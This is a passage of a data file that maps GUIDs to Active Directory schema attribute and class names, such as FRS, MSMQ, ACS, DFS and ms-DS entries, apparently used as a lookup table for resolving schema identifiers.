"2a132584-9373-11d1-aebc-0000f80367c1": "FRS-Time-Last-Config-Change",
"29cc866e-49d3-4969-942e-1dbc0925d183": "ms-DS-Trust-Forest-Trust-Info",
"9a0dc33a-c100-11d1-bbc5-0080c76670c0": "MSMQ-Cost",
"7bfdcb83-4807-11d1-a9c3-0000f80367c1": "Repl-Topology-Stay-Of-Execution",
"0ae94a89-372f-4df2-ae8a-c64a2bc47278": "MS-TS-LicenseVersion",
"a8df74d6-c5ea-11d1-bbcb-0080c76670c0": "Residential-Person",
"1cb355a1-56d0-11d1-a9c6-0000f80367c1": "ACS-Cache-Timeout",
"1be8f172-a9ff-11d0-afe2-00c04fd930c9": "FRS-Update-Timeout",
"461744d7-f3b6-45ba-8753-fb9552a5df32": "ms-DS-Tombstone-Quota-Factor",
"9a0dc334-c100-11d1-bbc5-0080c76670c0": "MSMQ-CSP-Name",
"bf967a16-0de6-11d0-a285-00aa003049e2": "Repl-UpToDate-Vector",
"4b0df103-8d97-45d9-ad69-85c3080ba4e7": "MS-TS-LicenseVersion2",
"7a2be07c-302f-4b96-bc90-0795d66885f8": "documentSeries",
"7f56127a-5301-11d1-a9c5-0000f80367c1": "ACS-Direction",
"2a132585-9373-11d1-aebc-0000f80367c1": "FRS-Version",
"7b7cce4f-f1f5-4bb6-b7eb-23504af19e75": "ms-DS-Top-Quota-Usage",
"2df90d83-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Dependent-Client-Service",
"bf967a18-0de6-11d0-a285-00aa003049e2": "Replica-Source",
"f8ba8f81-4cab-4973-a3c8-3a6da62a5e31": "MS-TS-LicenseVersion3",
"19195a5a-6da0-11d0-afd3-00c04fd930c9": "Domain",
"b93e3a78-cbae-485e-a07b-5ef4ae505686": "rFC822LocalPart",
"1cb355a0-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-DeadTime",
"26d9736c-6070-11d1-a9c6-0000f80367c1": "FRS-Version-GUID",
"d064fb68-1480-11d3-91c1-0000f87a57d4": "MS-DS-Machine-Account-Quota",
"2df90d76-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Dependent-Client-Services",
"bf967a1c-0de6-11d0-a285-00aa003049e2": "Reports",
"70ca5d97-2304-490a-8a27-52678c8d2095": "MS-TS-LicenseVersion4",
"19195a5b-6da0-11d0-afd3-00c04fd930c9": "Domain-DNS",
"1cb3559e-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-Priority",
"1be8f173-a9ff-11d0-afe2-00c04fd930c9": "FRS-Working-Path",
"638ec2e8-22e7-409c-85d2-11b21bee72de": "ms-DS-Object-Reference",
"9a0dc33c-c100-11d1-bbc5-0080c76670c0": "MSMQ-Digests",
"45ba9d1a-56fa-11d2-90d0-00c04fd91ab1": "Repl-Interval",
"f3bcc547-85b0-432c-9ac0-304506bf2c83": "MS-TS-ManagingLS",
"6617188d-8f3c-11d0-afda-00c04fd930c9": "RID-Manager",
"1cb3559f-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-Refresh",
"66171887-8f3c-11d0-afda-00c04fd930c9": "FSMO-Role-Owner",
"2b702515-c1f7-4b3b-b148-c0e4c6ceecb4": "ms-DS-Object-Reference-BL",
"0f71d8e0-da3b-11d1-90a5-00c04fd91ab1": "MSMQ-Digests-Mig",
"bf967a1d-0de6-11d0-a285-00aa003049e2": "Reps-From",
"349f0757-51bd-4fc8-9d66-3eceea8a25be": "MS-TS-ManagingLS2",
"bf967a99-0de6-11d0-a285-00aa003049e2": "Domain-Policy",
"7f561287-5301-11d1-a9c5-0000f80367c1": "ACS-Enable-ACS-Service",
"5fd424a1-1262-11d0-a060-00aa006c33ed": "Garbage-Coll-Period",
"93f701be-fa4c-43b6-bc2f-4dbea718ffab": "ms-DS-Operations-For-Az-Role",
"2df90d82-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Ds-Service",
"bf967a1e-0de6-11d0-a285-00aa003049e2": "Reps-To",
"fad5dcc1-2130-4c87-a118-75322cd67050": "MS-TS-ManagingLS3",
"7bfdcb89-4807-11d1-a9c3-0000f80367c1": "RID-Set",
"f072230e-aef5-11d1-bdcf-0000f80367c1": "ACS-Enable-RSVP-Accounting",
"bf96797a-0de6-11d0-a285-00aa003049e2": "Generated-Connection",
"f85b6228-3734-4525-b6b7-3f3bb220902c": "ms-DS-Operations-For-Az-Role-BL",
"2df90d78-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Ds-Services",
"7d6c0e93-7e20-11d0-afd6-00c04fd930c9": "Required-Categories",
"f7a3b6a0-2107-4140-b306-75cb521731e5": "MS-TS-ManagingLS4",
"8bfd2d3d-efda-4549-852c-f85e137aedc6": "domainRelatedObject",
"7f561285-5301-11d1-a9c5-0000f80367c1": "ACS-Enable-RSVP-Message-Logging",
"16775804-47f3-11d1-a9c3-0000f80367c1": "Generation-Qualifier",
"1aacb436-2e9d-44a9-9298-ce4debeb6ebf": "ms-DS-Operations-For-Az-Task",
"9a0dc331-c100-11d1-bbc5-0080c76670c0": "MSMQ-Encrypt-Key",
"7bfdcb7f-4807-11d1-a9c3-0000f80367c1": "Retired-Repl-DSA-Signatures",
"87e53590-971d-4a52-955b-4794d15a84ae": "MS-TSLS-Property01",
"7860e5d2-c8b0-4cbb-bd45-d9455beb9206": "room",
"eded5844-b3c3-41c3-a9e6-8984b52b7f98": "ms-Org-Group-Subtype-Name",
"7f561286-5301-11d1-a9c5-0000f80367c1": "ACS-Event-Log-Level",
"f0f8ff8e-1191-11d0-a060-00aa006c33ed": "Given-Name",
"a637d211-5739-4ed1-89b2-88974548bc59": "ms-DS-Operations-For-Az-Task-BL",
"9a0dc32f-c100-11d1-bbc5-0080c76670c0": "MSMQ-Foreign",
"b7c69e6d-2cc7-11d2-854e-00a0c983f608": "Token-Groups",
"47c77bb0-316e-4e2f-97f1-0d4c48fca9dd": "MS-TSLS-Property02",
"09b10f14-6f93-11d2-9905-0000f87a57d4": "DS-UI-Settings",
"49b7560b-4707-4aa0-a27c-e17a09ca3f97": "ms-Org-Is-Organizational-Group",
"dab029b6-ddf7-11d1-90a5-00c04fd91ab1": "ACS-Identity-Name",
"f754c748-06f4-11d2-aa53-00c04fd7d83a": "Global-Address-List",
"79d2f34c-9d7d-42bb-838f-866b3e4400e2": "ms-DS-Other-Settings",
"9a0dc32c-c100-11d1-bbc5-0080c76670c0": "MSMQ-In-Routing-Servers",
"46a9b11d-60ae-405a-b7e8-ff8a58d456d2": "Token-Groups-Global-And-Universal",
"6a84ede5-741e-43fd-9dd6-aa0f61578621": "ms-DFSR-DisablePacketPrivacy",
"80212842-4bdc-11d1-a9c4-0000f80367c1": "Rpc-Container",
"8f905f24-a413-435a-8ed1-35385ec179f7": "ms-Org-Other-Display-Names",
"f072230c-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-Aggregate-Peak-Rate-Per-User",
"bf96797d-0de6-11d0-a285-00aa003049e2": "Governs-ID",
"564e9325-d057-c143-9e3b-4f9e5ef46f93": "ms-DS-Principal-Name",
"8ea825aa-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Interval1",
"040fc392-33df-11d2-98b2-0000f87a57d4": "Token-Groups-No-GC-Acceptable",
"87811bd5-cd8b-45cb-9f5d-980f3a9e0c97": "ms-DFSR-DefaultCompressionExclusionFilter",
"3fdfee52-47f4-11d1-a9c3-0000f80367c1": "DSA",
"ee5b6790-3358-41a8-93f2-134ce21f3813": "ms-Org-Leaders",
"7f56127e-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Duration-Per-Flow",
"f30e3bbe-9ff0-11d1-b603-0000f80367c1": "GP-Link",
"fbb9a00d-3a8c-4233-9cf9-7189264903a1": "ms-DS-Quota-Amount",
"99b88f52-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Interval2",
"bf967a21-0de6-11d0-a285-00aa003049e2": "Revision",
"a68359dc-a581-4ee6-9015-5382c60f0fb4": "ms-DFSR-OnDemandExclusionFileFilter",
"bf967aac-0de6-11d0-a285-00aa003049e2": "rpc-Entry",
"afa58eed-a698-417e-9f56-fad54252c5f4": "ms-Org-Leaders-BL",
"f0722310-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-No-Of-Account-Files",
"f30e3bbf-9ff0-11d1-b603-0000f80367c1": "GP-Options",
"6655b152-101c-48b4-b347-e1fcebc60157": "ms-DS-Quota-Effective",
"9a0dc321-c100-11d1-bbc5-0080c76670c0": "MSMQ-Journal",
"bf967a22-0de6-11d0-a285-00aa003049e2": "Rid",
"7d523aff-9012-49b2-9925-f922a0018656": "ms-DFSR-OnDemandExclusionDirectoryFilter",
"66d51249-3355-4c1f-b24e-81f252aca23b": "Dynamic-Object",
"1cb3559c-56d0-11d1-a9c6-0000f80367c1": "ACS-Max-No-Of-Log-Files",
"f30e3bc1-9ff0-11d1-b603-0000f80367c1": "GPC-File-Sys-Path",
"16378906-4ea5-49be-a8d1-bfd41dff4f65": "ms-DS-Quota-Trustee",
"9a0dc324-c100-11d1-bbc5-0080c76670c0": "MSMQ-Journal-Quota",
"66171889-8f3c-11d0-afda-00c04fd930c9": "RID-Allocation-Pool",
"11e24318-4ca6-4f49-9afe-e5eb1afa3473": "ms-DFSR-Options2",
"88611bdf-8cf4-11d0-afda-00c04fd930c9": "rpc-Group",
"7f561284-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Peak-Bandwidth",
"f30e3bc0-9ff0-11d1-b603-0000f80367c1": "GPC-Functionality-Version",
"b5a84308-615d-4bb7-b05f-2f1746aa439f": "ms-DS-Quota-Used",
"9a0dc325-c100-11d1-bbc5-0080c76670c0": "MSMQ-Label",
"66171888-8f3c-11d0-afda-00c04fd930c9": "RID-Available-Pool",
"936eac41-d257-4bb9-bd55-f310a3cf09ad": "ms-DFSR-CommonStagingPath",
"dd712229-10e4-11d0-a05f-00aa006c33ed": "File-Link-Tracking",
"7f56127c-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Peak-Bandwidth-Per-Flow",
"32ff8ecc-783f-11d2-9916-0000f87a57d4": "GPC-Machine-Extension-Names",
"8a167ce4-f9e8-47eb-8d78-f7fe80abb2cc": "ms-DS-NC-Repl-Cursors",
"4580ad25-d407-48d2-ad24-43e6e56793d7": "MSMQ-Label-Ex",
"66171886-8f3c-11d0-afda-00c04fd930c9": "RID-Manager-Reference",
"135eb00e-4846-458b-8ea2-a37559afd405": "ms-DFSR-CommonStagingSizeInMb",
"88611be1-8cf4-11d0-afda-00c04fd930c9": "rpc-Profile",
"f0722311-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-Size-Of-RSVP-Account-File",
"42a75fc6-783f-11d2-9916-0000f87a57d4": "GPC-User-Extension-Names",
"9edba85a-3e9e-431b-9b1a-a5b6e9eda796": "ms-DS-NC-Repl-Inbound-Neighbors",
"9a0dc335-c100-11d1-bbc5-0080c76670c0": "MSMQ-Long-Lived",
"6617188c-8f3c-11d0-afda-00c04fd930c9": "RID-Next-RID",
"d64b9c23-e1fa-467b-b317-6964d744d633": "ms-DFSR-StagingCleanupTriggerInPercent",
"8e4eb2ed-4712-11d0-a1a0-00c04fd930c9": "File-Link-Tracking-Entry",
"1cb3559d-56d0-11d1-a9c6-0000f80367c1": "ACS-Max-Size-Of-RSVP-Log-File",
"7bd4c7a6-1add-4436-8c04-3999a880154c": "GPC-WQL-Filter",
"855f2ef5-a1c5-4cc4-ba6d-32522848b61f": "ms-DS-NC-Repl-Outbound-Neighbors",
"9a0dc33f-c100-11d1-bbc5-0080c76670c0": "MSMQ-Migrated",
"6617188a-8f3c-11d0-afda-00c04fd930c9": "RID-Previous-Allocation-Pool",
"b786cec9-61fd-4523-b2c1-5ceb3860bb32": "ms-DFS-Comment-v2",
"f29653cf-7ad0-11d0-afd6-00c04fd930c9": "rpc-Profile-Element",
"81f6e0df-3b90-11d2-90cc-00c04fd91ab1": "ACS-Max-Token-Bucket-Per-Flow",
"bf96797e-0de6-11d0-a285-00aa003049e2": "Group-Attributes",
"97de9615-b537-46bc-ac0f-10720f3909f3": "ms-DS-NC-Replica-Locations",
"1d2f4412-f10d-4337-9b48-6e5b125cd265": "MSMQ-Multicast-Address",
"7bfdcb7b-4807-11d1-a9c3-0000f80367c1": "RID-Set-References",
"35b8b3d9-c58f-43d6-930e-5040f2f1a781": "ms-DFS-Generation-GUID-v2",
"89e31c12-8530-11d0-afda-00c04fd930c9": "Foreign-Security-Principal",
"7f56127b-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Token-Rate-Per-Flow",
"bf967980-0de6-11d0-a285-00aa003049e2": "Group-Membership-SAM",
"3df793df-9858-4417-a701-735a1ecebf74": "ms-DS-NC-RO-Replica-Locations",
"9a0dc333-c100-11d1-bbc5-0080c76670c0": "MSMQ-Name-Style",
"6617188b-8f3c-11d0-afda-00c04fd930c9": "RID-Used-Pool",
"3c095e8a-314e-465b-83f5-ab8277bcf29b": "ms-DFS-Last-Modified-v2",
"88611be0-8cf4-11d0-afda-00c04fd930c9": "rpc-Server",
"87a2d8f9-3b90-11d2-90cc-00c04fd91ab1": "ACS-Maximum-SDU-Size",
"eea65905-8ac6-11d0-afda-00c04fd930c9": "Group-Priority",
"f547511c-5b2a-44cc-8358-992a88258164": "ms-DS-NC-RO-Replica-Locations-BL",
"eb38a158-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Nt4-Flags",
"8297931c-86d3-11d0-afda-00c04fd930c9": "Rights-Guid",
"edb027f3-5726-4dee-8d4e-dbf07e1ad1f1": "ms-DFS-Link-Identity-GUID-v2",
"c498f152-dc6b-474a-9f52-7cdba3d7d351": "friendlyCountry",
"9c65329b-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Delay-Variation",
"9a9a021e-4a5b-11d1-a9c3-0000f80367c1": "Group-Type",
"2de144fc-1f52-486f-bdf4-16fcc3084e54": "ms-DS-Non-Security-Group-Extra-Classes",
"6f914be6-d57e-11d1-90a2-00c04fd91ab1": "MSMQ-Nt4-Stub",
"a8df7465-c5ea-11d1-bbcb-0080c76670c0": "Role-Occupant",
"86b021f6-10ab-40a2-a252-1dc0cc3be6a9": "ms-DFS-Link-Path-v2",
"f29653d0-7ad0-11d0-afd6-00c04fd930c9": "rpc-Server-Element",
"9517fefb-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Latency",
"eea65904-8ac6-11d0-afda-00c04fd930c9": "Groups-to-Ignore",
"d161adf0-ca24-4993-a3aa-8b2c981302e8": "MS-DS-Per-User-Trust-Quota",
"9a0dc330-c100-11d1-bbc5-0080c76670c0": "MSMQ-OS-Type",
"81d7f8c2-e327-4a0d-91c6-b42d4009115f": "roomNumber",
"57cf87f7-3426-4841-b322-02b3b6e9eba8": "ms-DFS-Link-Security-Descriptor-v2",
"8447f9f3-1027-11d0-a05f-00aa006c33ed": "FT-Dfs",
"8d0e7195-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Policed-Size",
"bf967982-0de6-11d0-a285-00aa003049e2": "Has-Master-NCs",
"8b70a6c6-50f9-4fa3-a71e-1ce03040449b": "MS-DS-Per-User-Trust-Tombstones-Quota",
"9a0dc32b-c100-11d1-bbc5-0080c76670c0": "MSMQ-Out-Routing-Servers",
"7bfdcb80-4807-11d1-a9c3-0000f80367c1": "Root-Trust",
"200432ce-ec5f-4931-a525-d7f4afe34e68": "ms-DFS-Namespace-Identity-GUID-v2",
"2a39c5be-8960-11d1-aebc-0000f80367c1": "RRAS-Administration-Connection-Point",
"aec2cfe3-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Max-SDU-Size",
"bf967981-0de6-11d0-a285-00aa003049e2": "Has-Partial-Replica-NCs",
"d921b50a-0ab2-42cd-87f6-09cf83a91854": "ms-DS-Preferred-GC-Site",
"9a0dc328-c100-11d1-bbc5-0080c76670c0": "MSMQ-Owner-ID",
"88611bde-8cf4-11d0-afda-00c04fd930c9": "rpc-Ns-Annotation",
"0c3e5bc5-eb0e-40f5-9b53-334e958dffdb": "ms-DFS-Properties-v2",
"bf967a9c-0de6-11d0-a285-00aa003049e2": "Group",
"b6873917-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Min-Policed-Size",
"5fd424a7-1262-11d0-a060-00aa006c33ed": "Help-Data16",
"d7c53242-724e-4c39-9d4c-2df8c9d66c7a": "ms-DS-Repl-Attribute-Meta-Data",
"2df90d75-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Prev-Site-Gates",
"bf967a23-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Bindings",
"ec6d7855-704a-4f61-9aa6-c49a7c1d54c7": "ms-DFS-Schema-Major-Version",
"f39b98ae-938d-11d1-aebd-0000f80367c1": "RRAS-Administration-Dictionary",
"a331a73f-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Peak-Rate",
"5fd424a8-1262-11d0-a060-00aa006c33ed": "Help-Data32",
"2f5c8145-e1bd-410b-8957-8bfa81d5acfd": "ms-DS-Repl-Value-Meta-Data",
"9a0dc327-c100-11d1-bbc5-0080c76670c0": "MSMQ-Privacy-Level",
"7a0ba0e0-8e98-11d0-afda-00c04fd930c9": "rpc-Ns-Codeset",
"fef9a725-e8f1-43ab-bd86-6a0115ce9e38": "ms-DFS-Schema-Minor-Version",
"bf967a9d-0de6-11d0-a285-00aa003049e2": "Group-Of-Names",
"a916d7c9-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Token-Size",
"5fd424a9-1262-11d0-a060-00aa006c33ed": "Help-File-Name",
"0ea12b84-08b3-11d3-91bc-0000f87a57d4": "MS-DS-Replicates-NC-Reason",
"9a0dc33e-c100-11d1-bbc5-0080c76670c0": "MSMQ-QM-ID",
"80212841-4bdc-11d1-a9c4-0000f80367c1": "rpc-Ns-Entry-Flags",
"2d7826f0-4cf7-42e9-a039-1110e0d9ca99": "ms-DFS-Short-Name-Link-Path-v2",
"bf967a91-0de6-11d0-a285-00aa003049e2": "Sam-Domain-Base",
"1cb355a2-56d0-11d1-a9c6-0000f80367c1": "ACS-Non-Reserved-Tx-Limit",
"ec05b750-a977-4efe-8e8d-ba6c1a6e33a8": "Hide-From-AB",
"85abd4f4-0a89-4e49-bdec-6f35bb2562ba": "ms-DS-Replication-Notify-First-DSA-Delay",
"8e441266-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Queue-Journal-Quota",
"bf967a24-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Group",
"6ab126c6-fa41-4b36-809e-7ca91610d48f": "ms-DFS-Target-List-v2",
"0310a911-93a3-4e21-a7a3-55d85ab2c48b": "groupOfUniqueNames",
"fe7afe45-3d14-43a7-afa7-3a1b144642af": "ms-Mcs-AdmPwdExpirationTime",
"f072230d-aef5-11d1-bdcf-0000f80367c1": "ACS-Non-Reserved-Tx-Size",
"bf967985-0de6-11d0-a285-00aa003049e2": "Home-Directory",
"d63db385-dd92-4b52-b1d8-0d3ecc0e86b6": "ms-DS-Replication-Notify-Subsequent-DSA-Delay",
"2df90d87-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Queue-Name-Ext",
"bf967a25-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Interface-ID",
"ea944d31-864a-4349-ada5-062e2c614f5e": "ms-DFS-Ttl-v2",
"bf967aad-0de6-11d0-a285-00aa003049e2": "Sam-Server",
"4c9928d7-d725-4fa6-a109-aba3ad8790e5": "ms-Mcs-AdmPwd",
"7f561282-5301-11d1-a9c5-0000f80367c1": "ACS-Permission-Bits",
"bf967986-0de6-11d0-a285-00aa003049e2": "Home-Drive",
"08e3aa79-eb1c-45b5-af7b-8f94246c8e41": "ms-DS-ReplicationEpoch",
"3f6b8e12-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Queue-Quota",
"29401c48-7a27-11d0-afd6-00c04fd930c9": "rpc-Ns-Object-ID",
"3ced1465-7b71-2541-8780-1e1ea6243a82": "ms-DS-BridgeHead-Servers-Used",
"f30e3bc2-9ff0-11d1-b603-0000f80367c1": "Group-Policy-Container",
"1cb3559a-56d0-11d1-a9c6-0000f80367c1": "ACS-Policy-Name",
"a45398b7-c44a-4eb6-82d3-13c10946dbfe": "houseIdentifier",
"d5b35506-19d6-4d26-9afb-11357ac99b5e": "ms-DS-Retired-Repl-NC-Signatures",
"9a0dc320-c100-11d1-bbc5-0080c76670c0": "MSMQ-Queue-Type",
"bf967a27-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Priority",
"51c9f89d-4730-468d-a2b5-1d493212d17e": "ms-DS-Is-Used-As-Resource-Security-Attribute",
"bf967aae-0de6-11d0-a285-00aa003049e2": "Secret",
"7f561281-5301-11d1-a9c5-0000f80367c1": "ACS-Priority",
"6043df71-fa48-46cf-ab7c-cbd54644b22d": "host",
"b39a61be-ed07-4cab-9a4a-4963ed0141e1": "ms-ds-Schema-Extensions",
"9a0dc322-c100-11d1-bbc5-0080c76670c0": "MSMQ-Quota",
"bf967a28-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Profile-Entry",
"2e28edee-ed7c-453f-afe4-93bd86f2174f": "ms-DS-Claim-Possible-Values",
"7bfdcb8a-4807-11d1-a9c3-0000f80367c1": "Index-Server-Catalog",
"f072230f-aef5-11d1-bdcf-0000f80367c1": "ACS-RSVP-Account-Files-Location",
"f0f8ff83-1191-11d0-a060-00aa006c33ed": "Icon-Path",
"4c51e316-f628-43a5-b06b-ffb695fcb4f3": "ms-DS-SD-Reference-Domain",
"3bfe6748-b544-485a-b067-1b310c4334bf": "MSMQ-Recipient-FormatName",
"29401c4a-7a27-11d0-afd6-00c04fd930c9": "rpc-Ns-Transfer-Syntax",
"c66217b9-e48e-47f7-b7d5-6552b8afd619": "ms-DS-Claim-Value-Type",
"4828cc14-1437-45bc-9b07-ad6f015e5f28": "inetOrgPerson",
"bf967aaf-0de6-11d0-a285-00aa003049e2": "Security-Object",
"1cb3559b-56d0-11d1-a9c6-0000f80367c1": "ACS-RSVP-Log-Files-Location",
"7d6c0e92-7e20-11d0-afd6-00c04fd930c9": "Implemented-Categories",
"4f146ae8-a4fe-4801-a731-f51848a4f4e4": "ms-DS-Security-Group-Extra-Classes",
"2df90d81-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Routing-Service",
"3e0abfd0-126a-11d0-a060-00aa006c33ed": "SAM-Account-Name",
"eebc123e-bae6-4166-9e5b-29884a8b76b0": "ms-DS-Claim-Attribute-Source",
"7f56127f-5301-11d1-a9c5-0000f80367c1": "ACS-Service-Type",
"7bfdcb87-4807-11d1-a9c3-0000f80367c1": "IndexedScopes",
"0e1b47d7-40a3-4b48-8d1b-4cac0c1cdf21": "ms-DS-Settings",
"2df90d77-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Routing-Services",
"6e7b626c-64f2-11d0-afd2-00c04fd930c9": "SAM-Account-Type",
"6afb0e4c-d876-437c-aeb6-c3e41454c272": "ms-DS-Claim-Type-Applies-To-Class",
"2df90d89-009f-11d2-aa4c-00c04fd7d83a": "Infrastructure-Update",
"bf967a92-0de6-11d0-a285-00aa003049e2": "Server",
"7f561279-5301-11d1-a9c5-0000f80367c1": "ACS-Time-Of-Day",
"52458023-ca6a-11d0-afff-0000f80367c1": "Initial-Auth-Incoming",
"c17c5602-bcb7-46f0-9656-6370ca884b72": "ms-DS-Site-Affinity",
"8bf0221b-7a06-4d63-91f0-1499941813d3": "MSMQ-Secured-Source",
"04d2d114-f799-4e9b-bcdc-90e8f5ba7ebe": "SAM-Domain-Updates",
"52c8d13a-ce0b-4f57-892b-18f5a43a2400": "ms-DS-Claim-Shares-Possible-Values-With",
"7f561280-5301-11d1-a9c5-0000f80367c1": "ACS-Total-No-Of-Flows",
"52458024-ca6a-11d0-afff-0000f80367c1": "Initial-Auth-Outgoing",
"789ee1eb-8c8e-4e4c-8cec-79b31b7617b5": "ms-DS-SPN-Suffixes",
"9a0dc32d-c100-11d1-bbc5-0080c76670c0": "MSMQ-Service-Type",
"dd712224-10e4-11d0-a05f-00aa006c33ed": "Schedule",
"54d522db-ec95-48f5-9bbd-1880ebbb2180": "ms-DS-Claim-Shares-Possible-Values-With-BL",
"07383086-91df-11d1-aebc-0000f80367c1": "Intellimirror-Group",
"f780acc0-56f0-11d1-a9c6-0000f80367c1": "Servers-Container",
"7cbd59a5-3b90-11d2-90cc-00c04fd91ab1": "ACS-Server-List",
"f0f8ff90-1191-11d0-a060-00aa006c33ed": "Initials",
"35319082-8c4a-4646-9386-c2949d49894d": "ms-DS-Tasks-For-Az-Role",
"9a0dc33d-c100-11d1-bbc5-0080c76670c0": "MSMQ-Services",
"bf967a2b-0de6-11d0-a285-00aa003049e2": "Schema-Flags-Ex",
"4d371c11-4cad-4c41-8ad2-b180ab2bd13c": "ms-DS-Members-Of-Resource-Property-List",
"6d05fb41-246b-11d0-a9c8-00aa006c33ed": "Additional-Information",
"96a7dd64-9118-11d1-aebc-0000f80367c1": "Install-Ui-Level",
"a0dcd536-5158-42fe-8c40-c00a7ad37959": "ms-DS-Tasks-For-Az-Role-BL",
"9a0dc33b-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sign-Certificates",
"bf967923-0de6-11d0-a285-00aa003049e2": "Schema-ID-GUID",
"7469b704-edb0-4568-a5a5-59f4862c75a7": "ms-DS-Members-Of-Resource-Property-List-BL",
"07383085-91df-11d1-aebc-0000f80367c1": "Intellimirror-SCP",
"b7b13123-b82e-11d0-afee-0000f80367c1": "Service-Administration-Point",
"032160be-9824-11d1-aec0-0000f80367c1": "Additional-Trusted-Service-Names",
"bf96798c-0de6-11d0-a285-00aa003049e2": "Instance-Type",
"b11c8ee2-5fcd-46a7-95f0-f38333f096cf": "ms-DS-Tasks-For-Az-Task",
"3881b8ea-da3b-11d1-90a5-00c04fd91ab1": "MSMQ-Sign-Certificates-Mig",
"f9fb64ae-93b4-11d2-9945-0000f87a57d4": "Schema-Info",
"b47f510d-6b50-47e1-b556-772c79e4ffc4": "ms-SPP-CSVLK-Pid",
"f0f8ff84-1191-11d0-a060-00aa006c33ed": "Address",
"b7c69e60-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Failover",
"df446e52-b5fa-4ca2-a42f-13f98a526c8f": "ms-DS-Tasks-For-Az-Task-BL",
"9a0dc332-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sign-Key",
"1e2d06b4-ac8f-11d0-afe3-00c04fd930c9": "Schema-Update",
"a601b091-8652-453a-b386-87ad239b7c08": "ms-SPP-CSVLK-Partial-Product-Key",
"26d97376-6070-11d1-a9c6-0000f80367c1": "Inter-Site-Transport",
"bf967ab1-0de6-11d0-a285-00aa003049e2": "Service-Class",
"f70b6e48-06f4-11d2-aa53-00c04fd7d83a": "Address-Book-Roots",
"b7c69e5e-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Generator",
"2cc4b836-b63f-4940-8d23-ea7acf06af56": "ms-DS-User-Account-Control-Computed",
"9a0dc337-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-1",
"bf967a2c-0de6-11d0-a285-00aa003049e2": "Schema-Version",
"9684f739-7b78-476d-8d74-31ad7692eef4": "ms-SPP-CSVLK-Sku-Id",
"5fd42461-1262-11d0-a060-00aa006c33ed": "Address-Entry-Display-Table",
"b7c69e5f-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Renew",
"add5cf10-7b09-4449-9ae6-2534148f8a72": "ms-DS-User-Password-Expiry-Time-Computed",
"9a0dc338-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-2",
"16f3a4c2-7e79-11d2-9921-0000f87a57d4": "Scope-Flags",
"9b663eda-3542-46d6-9df0-314025af2bac": "ms-SPP-KMS-Ids",
"26d97375-6070-11d1-a9c6-0000f80367c1": "Inter-Site-Transport-Container",
"28630ec1-41d5-11d1-a9c1-0000f80367c1": "Service-Connection-Point",
"5fd42462-1262-11d0-a060-00aa006c33ed": "Address-Entry-Display-Table-MSDOS",
"bf96798d-0de6-11d0-a285-00aa003049e2": "International-ISDN-Number",
"146eb639-bb9f-4fc1-a825-e29e00c77920": "ms-DS-UpdateScript",
"fd129d8a-d57e-11d1-90a2-00c04fd91ab1": "MSMQ-Site-Foreign",
"bf9679a8-0de6-11d0-a285-00aa003049e2": "Script-Path",
"69bfb114-407b-4739-a213-c663802b3e37": "ms-SPP-Installation-Id",
"16775781-47f3-11d1-a9c3-0000f80367c1": "Address-Home",
"bf96798e-0de6-11d0-a285-00aa003049e2": "Invocation-Id",
"773e93af-d3b4-48d4-b3f9-06457602d3d0": "ms-DS-Source-Object-DN",
"9a0dc339-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-Gates",
"c3dbafa6-33df-11d2-98b2-0000f87a57d4": "SD-Rights-Effective",
"6e8797c4-acda-4a49-8740-b0bd05a9b831": "ms-SPP-Confirmation-Id",
"b40ff825-427a-11d1-a9c2-0000f80367c1": "Ipsec-Base",
"bf967ab2-0de6-11d0-a285-00aa003049e2": "Service-Instance",
"5fd42463-1262-11d0-a060-00aa006c33ed": "Address-Syntax",
"b40ff81f-427a-11d1-a9c2-0000f80367c1": "Ipsec-Data",
"778ff5c9-6f4e-4b74-856a-d68383313910": "ms-DS-KrbTgt-Link",
"e2704852-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Site-Gates-Mig",
"bf967a2d-0de6-11d0-a285-00aa003049e2": "Search-Flags",
"098f368e-4812-48cd-afb7-a136b96807ed": "ms-SPP-Online-License",
"5fd42464-1262-11d0-a060-00aa006c33ed": "Address-Type",
"b40ff81e-427a-11d1-a9c2-0000f80367c1": "Ipsec-Data-Type",
"185c7821-3749-443a-bd6a-288899071adb": "ms-DS-Revealed-Users",
